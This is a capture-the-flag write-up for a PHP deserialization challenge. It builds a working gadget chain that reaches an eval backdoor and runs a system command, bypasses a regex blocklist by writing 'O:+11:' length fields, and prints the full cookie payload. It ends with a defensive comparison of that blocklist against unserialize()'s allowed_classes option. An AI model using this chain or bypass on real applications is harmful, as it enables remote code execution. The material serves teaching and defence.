CTFshow Web Beginner Track, Deserialization, Challenge 258
1. Code audit
<?php
error_reporting(0);
highlight_file(__FILE__);
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';
    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }
}
class info{
    public $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}
class backDoor{
    public $code;
    public function getInfo(){
        eval($this->code);
    }
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}
Following the logic, we need to:
- change the value of the $class property, and have the __construct() magic method instantiate the backDoor class instead of info, so that __destruct() ends up calling backDoor::getInfo();
- bypass the regex /[oc]:\d+:/i, which matches an "o:" or "c:" token followed by one or more digits and a closing ":", case-insensitively (that is, the length prefix of any serialized object or class token);
- make username and password match the values stored in the object.
2. Keep only the parts we need and build the chain
<?php
// Only the parts of the chain that matter are kept: ctfShowUser::__destruct()
// calls $this->class->getInfo(), so $class is pointed at a backDoor instance.
class ctfShowUser{
    public $class = 'backDoor';
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    public $code='system("tac ./flag.php");';
}
$a = serialize(new ctfShowUser());
echo $a . "\n";
// The filter /[oc]:\d+:/i expects a plain decimal right after "O:". A leading
// "+" (O:+11:, O:+8:) is still read as a length by unserialize() on the
// challenge server, but \d+ no longer matches directly after the colon.
$b = str_replace(':11', ':+11', $a);
$b = str_replace(':8', ':+8', $b);
echo $b . "\n";
// URL-encode the result for use as the cookie value.
echo urlencode($b);
payload:
url:?username=xxxxxx&password=xxxxxx
cookie: O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A25%3A%22system%28%22tac+.%2Fflag.php%22%29%3B%22%3B%7D%7D
Flag obtained.
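The root cause here is the control the challenge chose, not the "+" trick itself: a regex blocklist on the serialized text can be evaded by any alternative spelling the parser accepts, while it also rejects every legitimate object. The following is an added example, not code from the writeup or the challenge: it contrasts that blocklist with the `allowed_classes` option of `unserialize()`. The class names are the challenge's; `weakFilter()`, `safeUnserialize()`, `allowlistUnserialize()`, the two sample payloads and the inert `backDoor` stand-in (it records the call instead of running `eval()`) are assumptions constructed here.

```php
<?php
// Added example, not part of the writeup: contrasts the challenge's regex
// blocklist with unserialize()'s allowed_classes option. Class names come from
// the challenge; weakFilter(), safeUnserialize(), allowlistUnserialize() and
// the sample payloads are constructed here for illustration.

class info {
    public $user = 'xxxxxx';
    public function getInfo() { return $this->user; }
}

// Inert stand-in for the challenge's backDoor: it records that getInfo() ran
// instead of passing $code to eval().
class backDoor {
    public $code;
    public $triggered = false;
    public function getInfo() { $this->triggered = true; return 'backDoor::getInfo() ran'; }
}

// The challenge's check, unchanged: a blocklist on "O:<digits>:" / "C:<digits>:".
function weakFilter(string $data): bool {
    return !preg_match('/[oc]:\d+:/i', $data);
}

// Hardened form 1: never instantiate classes from untrusted input. Every object
// token becomes __PHP_Incomplete_Class, whose methods cannot be called, so no
// magic-method chain (__destruct -> getInfo -> eval) can start.
function safeUnserialize(string $data) {
    return @unserialize($data, ['allowed_classes' => false]);
}

// Hardened form 2: an allowlist of the classes the application really expects.
// Anything else (backDoor here) is still turned into __PHP_Incomplete_Class.
function allowlistUnserialize(string $data) {
    return @unserialize($data, ['allowed_classes' => ['info']]);
}

// Returns a short description of what unserialize() produced.
function describe($result): string {
    return $result === false ? 'false (rejected)' : get_class($result);
}

// Constructed payloads: a legitimate info object, and the writeup's "+" trick
// applied to the length field of a backDoor object.
$legit   = 'O:4:"info":1:{s:4:"user";s:3:"bob";}';
$evasive = 'O:+8:"backDoor":1:{s:4:"code";s:0:"";}';

// The blocklist rejects the legitimate object and accepts the evasive one:
// wrong on both counts.
printf("blocklist rejects the legitimate payload: %s\n", var_export(!weakFilter($legit), true));
printf("blocklist passes the '+' payload:         %s\n", var_export(weakFilter($evasive), true));

// Whether unserialize() itself still accepts a leading "+" depends on the PHP
// version; the challenge server did, as the writeup's flag shows.
printf("default unserialize() gave:   %s\n", describe(@unserialize($evasive)));
printf("safeUnserialize() gave:       %s\n", describe(safeUnserialize($evasive)));
printf("allowlistUnserialize() gave:  %s\n", describe(allowlistUnserialize($evasive)));

// The allowlist still lets the legitimate info object through intact.
$ok = allowlistUnserialize($legit);
printf("allowlistUnserialize() on legitimate data: %s, user=%s\n", describe($ok), $ok->getInfo());
```

Run it with `php example.php`. The two hardened forms never produce a `backDoor` instance regardless of how the length field is spelled, because the decision is made on the class name after parsing rather than on the raw bytes before it; the allowlist variant is the one to use when the application genuinely needs objects back from `unserialize()`, and `allowed_classes => false` (or a data format such as JSON) when it does not.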